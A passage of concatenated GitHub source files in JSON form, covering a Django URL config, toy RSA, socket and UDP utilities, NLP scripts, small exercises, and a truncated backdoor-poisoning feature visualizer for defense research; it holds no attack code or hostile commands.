+{"seq_id":"7216819464","text":"# pylint: disable=C0103\n\"\"\"URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom django.urls import include\n\nfrom lattedb.project.formfac.views import DiskConcatenatedFormFactor4DStatusView\nfrom lattedb.project.formfac.views import TapeConcatenatedFormFactor4DStatusView\nfrom lattedb.project.formfac.views import DiskTSlicedSAveragedFormFactor4DStatusView\nfrom lattedb.project.formfac.views import TapeTSlicedSAveragedFormFactor4DStatusView\nfrom lattedb.project.formfac.views import DiskTSlicedFormFactor4DStatusView\nfrom lattedb.project.formfac.views import DiskFormFactor4DStatusView\n\nfrom lattedb.project.formfac.views import DiskCorrelatorH5DsetStatusView\nfrom lattedb.project.formfac.views import TapeCorrelatorH5DsetStatusView\n\nfrom lattedb.project.formfac.views import DiskTSlicedSAveragedSpectrum4DStatusView\nfrom lattedb.project.formfac.views import TapeTSlicedSAveragedSpectrum4DStatusView\nfrom lattedb.project.formfac.views import DiskTSlicedSpectrum4DStatusView\nfrom lattedb.project.formfac.views import DiskSpectrum4DStatusView\n\nfrom lattedb.project.formfac.rest.serializers import ROUTER\n\napp_name = \"Project formfac\"\nurlpatterns = [\n path(r\"api/\", include(ROUTER.urls)),\n path(\n \"disk-concat-status\",\n DiskConcatenatedFormFactor4DStatusView.as_view(),\n name=\"Concatenated Form Factor Disk Status\",\n ),\n path(\n \"tape-concat-status\",\n TapeConcatenatedFormFactor4DStatusView.as_view(),\n name=\"Concatenated Form Factor Tape Status\",\n ),\n path(\n \"disk-sliced-averaged-status\",\n DiskTSlicedSAveragedFormFactor4DStatusView.as_view(),\n name=\"Sliced Averaged Form Factor Disk Status\",\n ),\n path(\n \"tape-sliced-averaged-status\",\n TapeTSlicedSAveragedFormFactor4DStatusView.as_view(),\n name=\"Sliced Averaged Form Factor Tape Status\",\n ),\n path(\n \"disk-sliced-status\",\n DiskTSlicedFormFactor4DStatusView.as_view(),\n name=\"Sliced Form Factor Disk Status\",\n ),\n path(\n \"disk-status\",\n DiskFormFactor4DStatusView.as_view(),\n name=\"Form Factor Disk Status\",\n ),\n path(\n \"disk-corr-status\",\n DiskCorrelatorH5DsetStatusView.as_view(),\n name=\"Correlator Disk Status\",\n ),\n path(\n \"tape-corr-status\",\n TapeCorrelatorH5DsetStatusView.as_view(),\n name=\"Correlator Tape Status\",\n ),\n path(\n \"disk-spec-sliced-averaged-status\",\n DiskTSlicedSAveragedSpectrum4DStatusView.as_view(),\n name=\"Sliced Averaged Spectrum Disk Status\",\n ),\n path(\n \"tape-spec-sliced-averaged-status\",\n TapeTSlicedSAveragedSpectrum4DStatusView.as_view(),\n name=\"Sliced Averaged Spectrum Tape Status\",\n ),\n path(\n \"disk-spec-sliced-status\",\n DiskTSlicedSpectrum4DStatusView.as_view(),\n name=\"Sliced Spectrum Disk Status\",\n ),\n path(\n \"disk-spec-status\",\n DiskSpectrum4DStatusView.as_view(),\n name=\"Spectrum Disk Status\",\n ),\n]\n","repo_name":"callat-qcd/lattedb","sub_path":"lattedb/project/formfac/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16017237747","text":"import random\nfrom collections import namedtuple\n\n\ndef get_primes(start, stop):\n if start >= stop:\n return []\n\n primes = [2]\n\n for n in range(3, stop + 1, 2):\n for p in primes:\n if n % p == 0:\n break\n else:\n primes.append(n)\n\n while primes and primes[0] < start:\n del primes[0]\n\n return primes\n\n\ndef are_relatively_prime(a, b):\n for n in range(2, min(a, b) + 1):\n if a % n == b % n == 0:\n return False\n return True\n\n\ndef make_key_pair(length):\n \"\"\"Create a public-private key pair.\n\n The key pair is generated from two random prime numbers. The argument\n ``length`` specifies the bit length of the number ``n`` shared between\n the two keys: the higher, the better.\n \"\"\"\n if length < 4:\n raise ValueError('cannot generate a key of length less '\n 'than 4 (got {!r})'.format(length))\n\n # First step: find a number ``n`` which is the product of two prime\n # numbers (``p`` and ``q``). ``n`` must have the number of bits specified\n # by ``length``, therefore it must be in ``range(n_min, n_max + 1)``.\n n_min = 1 << (length - 1)\n n_max = (1 << length) - 1\n\n # The key is stronger if ``p`` and ``q`` have similar bit length. We\n # choose two prime numbers in ``range(start, stop)`` so that the\n # difference of bit lengths is at most 2.\n start = 1 << (length // 2 - 1)\n stop = 1 << (length // 2 + 1)\n primes = get_primes(start, stop)\n\n # Now that we have a list of prime number candidates, randomly select\n # two so that their product is in ``range(n_min, n_max + 1)``.\n while primes:\n p = random.choice(primes)\n primes.remove(p)\n q_candidates = [q for q in primes\n if n_min <= p * q <= n_max]\n if q_candidates:\n q = random.choice(q_candidates)\n break\n else:\n raise AssertionError(\"cannot find 'p' and 'q' for a key of \"\n \"length={!r}\".format(length))\n\n # Second step: choose a number ``e`` lower than ``(p - 1) * (q - 1)``\n # which shares no factors with ``(p - 1) * (q - 1)``.\n stop = (p - 1) * (q - 1)\n for e in range(3, stop, 2):\n if are_relatively_prime(e, stop):\n break\n else:\n raise AssertionError(\"cannot find 'e' with p={!r} \"\n \"and q={!r}\".format(p, q))\n\n # Third step: find ``d`` such that ``(d * e - 1)`` is divisible by\n # ``(p - 1) * (q - 1)``.\n for d in range(3, stop, 2):\n if d * e % stop == 1:\n break\n else:\n raise AssertionError(\"cannot find 'd' with p={!r}, q={!r} \"\n \"and e={!r}\".format(p, q, e))\n return PublicKey(p * q, e), PrivateKey(p * q, d)\n\n\nclass PublicKey(namedtuple('PublicKey', 'n e')):\n __slots__ = ()\n\n def encrypt(self, x):\n return pow(x, self.e, self.n)\n\n\nclass PrivateKey(namedtuple('PrivateKey', 'n d')):\n __slots__ = ()\n\n def decrypt(self, x):\n return pow(x, self.d, self.n)\n\n\nif __name__ == '__main__':\n public_key, private_key = make_key_pair(12)\n print(public_key)\n print(private_key)\n\n encrypted_message = public_key.encrypt(123)\n print(encrypted_message)\n decrypted_message = private_key.decrypt(encrypted_message)\n print(decrypted_message)\n","repo_name":"fresko678/security","sub_path":"RSA.py","file_name":"RSA.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34509976352","text":"import sys\n\nsys.path.append('..')\n\n# import Can.comms\nfrom Can.new_Packet import Packet, PacketType, Command\n\nimport socket\nfrom random import randint\nimport time\nfrom ast import literal_eval as l_eval\nimport threading\n\nUDP_IP = '127.0.0.1'\nUDP_PORT = 2137\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nwith open('cal_data') as f:\n hardiron_calibration = l_eval(f.readline())\n\ndef wait_for_udp():\n sock.bind((\"127.0.0.1\", 2138))\n bufferSize = 1024\n\n while True:\n bytesAddressPair = sock.recvfrom(bufferSize)\n message = bytesAddressPair[0]\n address = bytesAddressPair[1]\n clientMsg = \"Message from Client:{}\".format(message)\n clientIP = \"Client IP Address:{}\".format(address)\n print(clientMsg)\n print(clientIP)\n\n\nthreading.Thread(target=wait_for_udp).start()\n\nwhile True:\n\n bp = Packet.create_base_packet(time.time(),randint(-10, 40),randint(800, 1100),randint(0,100), randint(1, 2000))\n ep = Packet.create_extended_packet(time.time(),randint(50, 55), randint(20,23), 0.6,0.5,0.2,0.1,0.3,0.4)\n studio_frame = f\"${bp.encode()[2:]};{';'.join(ep.encode().split(';')[2:-3])};{0}*\\n\"\n sock.sendto(bytes(studio_frame, 'utf-8'),(UDP_IP, UDP_PORT))\n time.sleep(0.5)\n\n","repo_name":"Terence-23/Cansat_Dr0p","sub_path":"legacy/Python/UDP_sender.py","file_name":"UDP_sender.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"12828245548","text":"from flask import Flask, request, jsonify\n\nfrom tracer import get_flask_middleware\nfrom opencensus.trace.execution_context import get_opencensus_tracer\napp = Flask(__name__)\nget_flask_middleware(app)\n\n\ndef _get_vendors_with_target(target_food, food_supplier_span, lookup_method='static'):\n food_supplier_span.add_annotation(\"Using {} lookup method\".format(lookup_method))\n if lookup_method == 'static':\n VENDOR_DATA = {\n 'http://127.0.0.1:5002': ['egg', 'bean', 'cheese'],\n 'http://127.0.0.1:5003': ['egg', 'potato'],\n 'http://127.0.0.1:5004': ['bread'],\n }\n return [vendor_url for vendor_url, vendor_items in VENDOR_DATA.items() if target_food in vendor_items]\n\n\n@app.route('/get_food_vendors', methods=['GET'])\ndef get_food_vendors():\n tracer = get_opencensus_tracer()\n with tracer.span(name=\"food_supplier\") as food_supplier_span:\n target_food = request.args['target_food']\n return jsonify(_get_vendors_with_target(target_food, food_supplier_span))\n\n\nif __name__ == '__main__':\n app.run(port=5001)\n","repo_name":"AndrewAXue/opentelemetry-starter","sub_path":"FoodSupplier.py","file_name":"FoodSupplier.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75363029608","text":"from langchain.schema import (\n AIMessage,\n HumanMessage,\n SystemMessage\n)\nfrom langchain.agents import load_tools\nfrom langchain.agents import initialize_agent\nfrom langchain.agents import AgentType\nfrom langchain.llms import OpenAI\nfrom langchain.chat_models import ChatOpenAI\nimport json\nimport time\n\n# temperature controls the randomness of the result 0 means almost determinist 1 means highly random\ndef init_llm():\n llm = OpenAI(temperature=0.1)\n return llm\n\ndef init_chat_model():\n chat_model = ChatOpenAI(temperature=0.1)\n return chat_model\n\ndef read_json_list():\n with open(\"/home/byteide/workspace/Moments/future.json\", \"r\") as file:\n files = json.load(file)\n return files\n\ndef write_json_list(list):\n with open(\"/home/byteide/workspace/Moments/future_zh.json\", \"w\") as file:\n json.dump(list, file)\n\ndef get_batch_translates(lists, chat_model):\n batch = [\n ]\n for li in lists:\n batch.append(\"translate '%s' into chinese\" % li[\"desc\"])\n # batch.append(HumanMessage(content=\"translate '%s' into chinese delightfully\" % token_str))\n \n result = chat_model.generate(batch)\n new_results = []\n for msg in result.generations:\n new_results.append(msg[0].text.replace(\"\\n\", \"\"))\n print(len(new_results))\n \n return new_results\n\ndef test():\n chat_model = init_llm()\n lists = read_json_list()\n batch = 100\n i = 0\n while i < len(lists):\n if i+batch >= len(lists):\n descs = get_batch_translates(lists[i:], chat_model)\n for j in range(len(lists)-i-1):\n lists[j+i][\"desc\"] = descs[j]\n else:\n print(\"here\")\n descs = get_batch_translates(lists[i:i+batch], chat_model)\n for j in range(batch):\n lists[j+i][\"desc\"] = descs[j]\n time.sleep(5)\n print(lists[i:i+5])\n i += batch\n write_json_list(lists)\n return\n \ndef to_utf8():\n with open(\"/home/byteide/workspace/Moments/future_zh.json\", \"r\") as file:\n files = json.load(file)\n with open(\"/home/byteide/workspace/Moments/future_zh.json\", \"w\") as file:\n json.dump(files, file, ensure_ascii=False)\n\n\n \n\nto_utf8()","repo_name":"xiechuxi/Moments","sub_path":"moments/nlp/qa.py","file_name":"qa.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36881776211","text":"from datetime import datetime, time, timedelta\r\n\r\ndef horallegada():\r\n\r\n print(\"Digite su hora de llegada\")\r\n horaE = int(input(\"Hora , Digite un numero entre el 1 y el 24 =♥ \"))\r\n while horaE < 1 or horaE > 24:\r\n print(\"HORA NO VALIDA\")\r\n horaE = int(input(\"Hora , Digite un numero entre el 1 y el 24 =♦ \"))\r\n else:\r\n print(\"Hora Ingresada\")\r\n\r\n minutoE = int(input(\"Minutos, Digite un numero entre el 1 y 60 =♥ \"))\r\n while minutoE < 0 or minutoE > 60:\r\n print(\"MINUTO NO VALIDO\")\r\n minutoE = int(input(\"Minuto, Digite un numero entre el 1 y 60 =♦\"))\r\n else:\r\n print(\"Minuto Ingresado\")\r\n\r\n hora_de_entrada = datetime.combine(datetime.today(), time(horaE, minutoE))\r\n\r\n return (hora_de_entrada)\r\n\r\n\r\ndef horasalida():\r\n print(\"Digite su hora de salida\")\r\n horaS = int(input(\"Hora, Digite un numero entre el 1 y el 24: \"))\r\n\r\n while horaS < 1 or horaS > 24:\r\n print(\"HORA NO VALIDA\")\r\n horaS = int(input(\"Hora, Digite un numero entre el 1 y el 24: \"))\r\n else:\r\n print(\"Hora de salida ingresada\")\r\n\r\n minutoS = int(input(\"Minutos, Digite un numero entre el 1 y el 60: \"))\r\n while minutoS < 0 or minutoS > 60:\r\n print(\"MINUTO NO VALIDO\")\r\n minutoS = int(input(\"Minutos, Digite un numero entre el 1 y 60: \"))\r\n else:\r\n print(\"Minuto de salida ingresado\")\r\n\r\n hora_de_salida = datetime.combine(datetime.today(), time(horaS, minutoS))\r\n\r\n return hora_de_salida\r\n\r\nhora_llegada = horallegada()\r\nprint(\"Hora de llegada:\", hora_llegada)\r\n\r\nhora_salida = horasalida()\r\nprint(\"Hora de salida:\", hora_salida)\r\n\r\nhorasTrabajadas = hora_salida - hora_llegada - timedelta(hours=1)\r\nprint(horasTrabajadas)","repo_name":"Tavarod/inicio","sub_path":"horaEntradaSalida.py","file_name":"horaEntradaSalida.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27043620483","text":"\ndef getEquidistantLetters(string):\n # char_indexed_array\n cia = [0 for i in range(27)]\n\n for s in string:\n cia[ord(s)-97] += 1\n \n # resutl_string\n rs = \"\"\n for i,v in enumerate(cia):\n rs += chr(i+97)*v \n return rs \n\nif __name__ == '__main__':\n t = int(input())\n while(t>0):\n s = input()\n print(getEquidistantLetters(s))\n t -= 1\n","repo_name":"mash-97/MineField","sub_path":"codeforces/1626/problem/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18076352093","text":"import numpy as np\n\n\ndef normalize(v, min_v, max_v):\n return (v - min_v) / (max_v - min_v)\n\n\ndef as_batches(x, y, batch_size, shuffle=True):\n x_size = len(x)\n assert x_size == len(y)\n\n indices = np.random.permutation(x_size) if shuffle else None\n\n for offset in range(0, x_size - batch_size + 1, batch_size):\n excerpt = indices[offset:offset + batch_size] if shuffle else slice(offset, offset + batch_size)\n yield x[excerpt], y[excerpt]\n","repo_name":"evilsocket/pwnagotchi","sub_path":"pwnagotchi/ai/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":6448,"dataset":"github-code","pt":"53"} +{"seq_id":"5999680478","text":"import signal\nimport logging\nimport threading\nimport argparse\nfrom tandem.rendezvous.executables.rendezvous import TandemRendezvous\n\nshould_shutdown = threading.Event()\n\n\ndef signal_handler(signal, frame):\n global should_shutdown\n should_shutdown.set()\n\n\ndef set_up_logging(log_location):\n logging.basicConfig(\n level=logging.DEBUG,\n format=\"%(asctime)s %(levelname)-8s %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M\",\n filename=log_location,\n filemode=\"w\",\n )\n\n\ndef main():\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n\n parser = argparse.ArgumentParser(\n description=\"Starts the Tandem rendezvous server.\"\n )\n parser.add_argument(\n \"--host\",\n default=\"\",\n help=\"The host address to bind to.\",\n )\n parser.add_argument(\n \"--port\",\n default=60000,\n type=int,\n help=\"The port to listen on.\",\n )\n parser.add_argument(\n \"--log-file\",\n default=\"/tmp/tandem-rendezvous.log\",\n help=\"The location of the log file.\",\n )\n args = parser.parse_args()\n\n set_up_logging(args.log_file)\n\n # Run the rendezvous server until asked to terminate\n with TandemRendezvous(args.host, args.port):\n should_shutdown.wait()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"typeintandem/tandem","sub_path":"rendezvous/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":697,"dataset":"github-code","pt":"53"} +{"seq_id":"72510161128","text":"import json\nimport os\nimport socket\nimport struct\n\n\nshare_dir = r'd:\\shared' # 文件地址\n\n\ndef get(cmds, conn):\n filename = cmds[1]\n # 3.以读的方式打开,读取文件\n # 1制作报头\n header_dic = {\n 'filename': filename,\n 'md5': 'xxdxx',\n # E:\\study\\第3模块,面向对象\\网络编程\\文件传输\\server\\share\\jiaoyue.mp4\n 'file_size': os.path.getsize(r'%s/%s' % (share_dir, filename))\n }\n header_json = json.dumps(header_dic)\n header_bytes = header_json.encode('utf-8')\n\n # 2 发送报头长度\n conn.send(struct.pack('i', len(header_bytes))) # 固定长度4\n\n # 3 发报头\n conn.send(header_bytes)\n # 4发真实数据\n with open('%s/%s' % (share_dir, filename), 'rb') as f:\n # conn.send(f.read())\n for a in f:\n conn.send(a)\n\n\ndef put(pc):\n # 2.接受文件内容,以写的方式打开一个新文件,写入客户端新文件中\n # 1收报头长度\n obj = pc.recv(4)\n header_size = struct.unpack('i', obj)[0]\n\n # 2接收报头\n header_bytes = pc.recv(header_size)\n\n # 3解析报头,对于数据的描述\n header_json = header_bytes.decode('utf-8')\n header_dic = json.loads(header_json)\n print(header_dic)\n total_size = header_dic['file_size']\n file_name = header_dic['filename']\n\n # 4 接受真实的数据\n with open('%s/%s' % (share_dir, file_name), 'wb') as f:\n recv_size = 0\n while recv_size < total_size:\n res = pc.recv(1024)\n f.write(res)\n recv_size += len(res)\n print('总大小:%s 已经下载大小:%s' % (total_size, recv_size))\n\n\ndef run():\n phone = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n phone.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # 回收重用端口10000\n phone.bind(('127.0.0.1', 10000)) # 0-65535 0-1024给操作系统,\n phone.listen(5)\n while True: # 建链接循环\n conn, client_addr = phone.accept()\n print(client_addr)\n while True: # 通信循环\n try:\n # 1.收命令\n res = conn.recv(1024) # get jiaoyue.mp4\n # 2.解析命令,提取相应命令参数\n cmds = res.decode('utf-8').split() # ['get', 'jiaoyue.mp4']\n if cmds[0] == 'get':\n get(cmds, conn)\n elif cmds[0] == 'put':\n put(conn)\n elif cmds[0] == 'stop':\n print('成功关闭连接')\n break\n except ConnectionResetError:\n break\n conn.close()\n phone.close()\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"xuanyuanchl/AutomationFrameworks","sub_path":"SocketTest/src/socketTest/socketServer.py","file_name":"socketServer.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41011208762","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 14 16:25:26 2019\n\n@author: bhaku\n\"\"\"\n\nimport os, zipfile,glob\nfrom collections import Counter\nimport sys\nfrom os.path import join, abspath, realpath, dirname\n\nimport os\nfrom textblob import TextBlob \nimport pandas as pd \n\ndir_name = os.path.dirname(os.path.abspath('__file__'))\nprint (dir_name)\n\nextension = \".zip\"\n\nzip_files = glob.glob('*.zip')\n\nfor zip_filename in zip_files:\n dir_name = os.path.splitext(zip_filename)[0]\n os.mkdir(dir_name)\n zip_handler = zipfile.ZipFile(zip_filename, \"a\")\n zip_handler.extractall(dir_name)\n #delete zip files after extraction\n'''for item in os.listdir(dir_name): # loop through items in dir\n if item.endswith(extension): # check for \".zip\" extension\n file_name = os.path.abspath(item) # get full path of files\n os.remove(file_name) # delete zipped file'''\n\n\nfor item in os.path.dirname(\"__file__\"):\n if item.endswith(\".zip\"):\n os.remove(os.path.join(dir_name, item))\n\nt_path=[] \nfor path, subdirs, files in os.walk(dir_name):\n \n for name in files:\n #text_path=[]\n t_path.append(os.path.join(path, name)) \n print(name)\n\nterm = \"__MACOSX\" # AS MAC OS GIVES ADDITIONAL FILES WHILE ZIPPING WHICH ARE NOT ENCODED PROPERLY.WE WILL REMOVE IT\nindex=[]\nfor i,x in enumerate(t_path):\n words = x.split('\\\\\\\\') #split the sentence into individual words\n\n if term in words: #see if one of the words in the sentence is the word we want\n t_path.pop(i)\n \nterm = \"__MACOSX\" # AS MAC OS GIVES ADDITIONAL FILES WHILE ZIPPING WHICH ARE NOT ENCODED PROPERLY.WE WILL REMOVE IT\nindex=[]\nfor i,x in enumerate(t_path):\n words = x.split('\\\\\\\\') #split the sentence into individual words\n\n if term in words: #see if one of the words in the sentence is the word we want\n t_path.pop(i)\n \n\nwith open(\"result.txt\") as f:\n content = f.readlines()\n# you may also want to remove whitespace characters like `\\n` at the end of each line\ncontent = [x.strip() for x in content]\nshe='She\\'s'\nhe='He\\'s'\nfor i in content:\n if i.find('She')is not -1: \n file= open(\"FemaleOutput.txt\", 'a')\n file.write(f\"{i}\\n\")\n\n elif i.find('He')is not -1:\n file= open(\"MaleOutput.txt\", 'a')\n file.write((f\"{i}\\n\"))\n\n# Sentiment analysis\n#for male heroes\nfrom textblob import TextBlob \nimport pandas as pd \nfh = open('MaleOutput.txt')\n\ndef maledf(textfile):\n #fh = open(textfile)\n df_male=pd.DataFrame()\n \n df_male = pd.read_csv(textfile, sep=\"\\n\", header=None)\n df_male.columns=[\"Text\"]\n df_male[\"textblob\"]=df_male[\"Text\"].apply(lambda x:TextBlob(x)) \n df_male[\"polarity\"]=df_male[\"textblob\"].apply(lambda x :x.sentiment[0])\n df_male[\"subjectivity\"]=df_male[\"textblob\"].apply(lambda x :x.sentiment[1])\n return df_male\ndf_male=maledf('MaleOutput.txt')\ndef femaledf(textfile):\n #fh = open(textfile)\n df_female=pd.DataFrame()\n \n df_female = pd.read_csv(textfile, sep=\"\\n\", header=None)\n df_female.columns=[\"Text\"]\n df_female[\"textblob\"]=df_female[\"Text\"].apply(lambda x:TextBlob(x)) \n df_female[\"polarity\"]=df_female[\"textblob\"].apply(lambda x :x.sentiment[0])\n df_female[\"subjectivity\"]=df_female[\"textblob\"].apply(lambda x :x.sentiment[1])\n return df_female\n\ndf_female=femaledf('FemaleOutput.txt')\ndf_male=df_male.sort_values(by='polarity', ascending=False)\ndf_female=df_female.sort_values(by='polarity', ascending=False)\n\nTop10_positive_male=df_male.head(10)\n\ndf_male=df_male.sort_values(by='polarity')\nTop10_negative_male=df_male.head(10)\n\nTop10_positive_female=df_female.head(10)\n\ndf_female=df_female.sort_values(by='polarity')\nTop10_negative_female=df_female.head(10)\n\n# Python program to find the k most frequent words \n \ndef Counter1(filename):\n with open(filename, 'r') as file:\n datastring = file.read().replace('\\n', '')\n # split() returns list of all the words in the string \n \n blob=TextBlob(datastring)\n qaz=blob.noun_phrases\n \n decriptors_series=[]\n for i in range(0,len(qaz)): \n decriptors_series.append(qaz[i]) \n Counter = Counter(decriptors_series) \n most_occur = Counter.most_common(10) \n return most_occur \n\na=Counter1('result.txt')\nprint(a)\n\n","repo_name":"sbhakuni/FE-595","sub_path":"FE595TextAnalysis.py","file_name":"FE595TextAnalysis.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28907252482","text":"import random\nimport numpy as np\nimport torch\nimport os\nfrom torchvision import transforms\nimport argparse\nfrom torch import nn\nfrom utils import supervisor, tools, default_args\nimport config\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nfrom matplotlib import pyplot as plt\nfrom sklearn import svm\nfrom sklearn.metrics import silhouette_score\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-method', type=str, required=False, default='pca',\n choices=['pca', 'tsne', 'oracle', 'mean_diff', 'SS'])\nparser.add_argument('-dataset', type=str, required=False, default=default_args.parser_default['dataset'],\n choices=default_args.parser_choices['dataset'])\nparser.add_argument('-poison_type', type=str, required=True,\n choices=default_args.parser_choices['poison_type'])\nparser.add_argument('-poison_rate', type=float, required=False,\n choices=default_args.parser_choices['poison_rate'],\n default=default_args.parser_default['poison_rate'])\nparser.add_argument('-cover_rate', type=float, required=False,\n choices=default_args.parser_choices['cover_rate'],\n default=default_args.parser_default['cover_rate'])\nparser.add_argument('-alpha', type=float, required=False, default=default_args.parser_default['alpha'])\nparser.add_argument('-test_alpha', type=float, required=False, default=None)\nparser.add_argument('-trigger', type=str, required=False,\n default=None)\nparser.add_argument('-no_aug', default=False, action='store_true')\nparser.add_argument('-model', type=str, required=False, default=None)\nparser.add_argument('-model_path', required=False, default=None)\nparser.add_argument('-no_normalize', default=False, action='store_true')\nparser.add_argument('-devices', type=str, default='0')\nparser.add_argument('-target_class', type=int, default=-1)\nparser.add_argument('-seed', type=int, required=False, default=default_args.seed)\n\nargs = parser.parse_args()\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"%s\" % args.devices\ntools.setup_seed(args.seed)\n\nif args.target_class == -1:\n target_class = config.target_class[args.dataset]\nelse:\n target_class = args.target_class\n\nif args.trigger is None:\n args.trigger = config.trigger_default[args.dataset][args.poison_type]\n\nbatch_size = 128\nkwargs = {'num_workers': 4, 'pin_memory': True}\n\n\nclass mean_diff_visualizer:\n\n def fit_transform(self, clean, poison):\n clean_mean = clean.mean(dim=0)\n poison_mean = poison.mean(dim=0)\n mean_diff = poison_mean - clean_mean\n print(\"Mean L2 distance between poison and clean:\", torch.norm(mean_diff, p=2).item())\n\n proj_clean_mean = torch.matmul(clean, mean_diff)\n proj_poison_mean = torch.matmul(poison, mean_diff)\n\n return proj_clean_mean, proj_poison_mean\n\n\nclass oracle_visualizer:\n\n def __init__(self):\n self.clf = svm.LinearSVC()\n\n def fit_transform(self, clean, poison):\n\n clean = clean.numpy()\n num_clean = len(clean)\n\n poison = poison.numpy()\n num_poison = len(poison)\n\n # print(clean.shape, poison.shape)\n\n X = np.concatenate([clean, poison], axis=0)\n y = []\n\n for _ in range(num_clean):\n y.append(0)\n for _ in range(num_poison):\n y.append(1)\n\n self.clf.fit(X, y)\n print(\"SVM Accuracy:\", self.clf.score(X, y))\n\n norm = np.linalg.norm(self.clf.coef_)\n self.clf.coef_ = self.clf.coef_ / norm\n self.clf.intercept_ = self.clf.intercept_ / norm\n\n projection = self.clf.decision_function(X)\n\n return projection[:num_clean], projection[num_clean:]\n\n\nclass spectral_visualizer:\n\n def fit_transform(self, clean, poison):\n all_features = torch.cat((clean, poison), dim=0)\n all_features -= all_features.mean(dim=0)\n _, _, V = torch.svd(all_features, compute_uv=True, some=False)\n vec = V[:, 0] # the top right singular vector is the first column of V\n vals = []\n for j in range(all_features.shape[0]):\n vals.append(torch.dot(all_features[j], vec).pow(2))\n vals = torch.tensor(vals)\n\n print(vals.shape)\n\n return vals[:clean.shape[0]], vals[clean.shape[0]:]\n\n\n\nif args.dataset == 'cifar10':\n num_classes = 10\nelif args.dataset == 'gtsrb':\n num_classes = 43\nelif args.dataset == 'imagenette':\n num_classes = 10\nelse:\n raise NotImplementedError(' %s' % args.dataset)\n\ndata_transform_aug, data_transform, trigger_transform, normalizer, denormalizer = supervisor.get_transforms(args)\n\n\narch = supervisor.get_arch(args)\n# Set up Poisoned Set\npoison_set_dir = supervisor.get_poison_set_dir(args)\nif os.path.exists(os.path.join(poison_set_dir, 'data')): # if old version\n poisoned_set_img_dir = os.path.join(poison_set_dir, 'data')\nif os.path.exists(os.path.join(poison_set_dir, 'imgs')): # if new version\n poisoned_set_img_dir = os.path.join(poison_set_dir, 'imgs')\npoisoned_set_label_path = os.path.join(poison_set_dir, 'labels')\npoison_indices_path = os.path.join(poison_set_dir, 'poison_indices')\n\npoisoned_set = tools.IMG_Dataset(data_dir=poisoned_set_img_dir,\n label_path=poisoned_set_label_path, transforms=data_transform)\n\npoisoned_set_loader = torch.utils.data.DataLoader(\n poisoned_set,\n batch_size=batch_size, shuffle=False, **kwargs)\n\npoison_indices = torch.tensor(torch.load(poison_indices_path))\n\n\ntest_set_dir = 'clean_set/%s/test_split/' % args.dataset\ntest_set_img_dir = os.path.join(test_set_dir, 'data')\ntest_set_label_path = os.path.join(test_set_dir, 'labels')\ntest_set = tools.IMG_Dataset(data_dir=test_set_img_dir, label_path=test_set_label_path,\n transforms=data_transform)\ntest_set_loader = torch.utils.data.DataLoader(\n test_set,\n batch_size=batch_size, shuffle=False, **kwargs\n)\n\n\n\n\n\nmodel_list = []\nalias_list = []\n\n\n\"\"\"\nif args.poison_type == 'none': # no poison => load vanilla data and model\n path = os.path.join('models', '%s_vanilla_no_aug.pt' % args.dataset)\n model_list.append(path)\n alias_list.append('vanilla_no_aug')\n\n path = os.path.join('models', '%s_vanilla_aug.pt' % args.dataset)\n model_list.append(path)\n alias_list.append('vanilla_aug')\"\"\"\n\nif (hasattr(args, 'model_path') and args.model_path is not None) or (hasattr(args, 'model') and args.model is not None):\n path = supervisor.get_model_dir(args)\n model_list.append(path)\n alias_list.append('assigned')\n\nelse:\n # args.no_aug = True\n # #path = os.path.join(poison_set_dir, 'full_base_no_aug.pt') #\n # path = supervisor.get_model_dir(args)\n # model_list.append(path)\n # alias_list.append(supervisor.get_model_name(args))\n\n args.no_aug = False\n #path = os.path.join(poison_set_dir, 'full_base_aug.pt') #supervisor.get_model_dir(args)\n path = supervisor.get_model_dir(args)\n model_list.append(path)\n alias_list.append(supervisor.get_model_name(args))\n\n\npoison_transform = supervisor.get_poison_transform(poison_type=args.poison_type, 